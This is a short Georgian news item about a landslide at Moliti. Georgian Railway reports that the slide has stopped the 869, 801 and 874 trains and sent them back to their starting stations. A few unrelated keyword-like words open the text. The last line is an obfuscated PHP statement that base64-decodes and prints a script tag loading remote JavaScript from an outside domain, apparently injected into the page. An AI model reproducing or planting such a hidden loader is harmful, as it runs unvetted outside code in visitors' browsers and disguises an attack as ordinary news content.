celsiusi
ავერსი შნაიდერი

 დასავლეთ საქართველოში, მოლითში მეწყრის ჩამოწოლის გამო, ზუგდიდი-თბილისის, ბათუმი-თბილისის და თბილისი-ფოთის რეისებზე მოძრავი მატარებლები ვეღარ აგრძელებენ მოძრაობას და საწყის სადგურებში დაბრუნდებიან, – ამის შესახებ ინფორმაციას საქართველოს რკინიგზა ავრცელებს.

რკინიგზის ცნობით, მატარებელთა მოძრაობა განახლდება ლიანდაგის სრულად გაწმენდისთანავე.

„ძვირფასო მგზავრებო, უხვი ნალექის გამო დასავლეთ საქართველოში, მოლითში ჩამოწვა მეწყერი და რეისზე არსებული მატარებლები ვეღარ გააგრძელებენ მოძრაობას, კონკრეტულად ზუგდიდი-თბილისის (869), ბათუმი-თბილისის (801) და თბილისი-ფოთის (874) რეისებზე მოძრავი შემადგენლობები დაბრუნდებიან საწყის სადგურებში.

აღნიშნული რეისების შესრულება დამოკიდებულია ამინდზე, მატარებელთა მოძრაობა განახლდება ლიანდაგის სრულად გაწმენდისთანავე“, – აღნიშნულია რკინიგზის ინფორმაციაში.

308
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");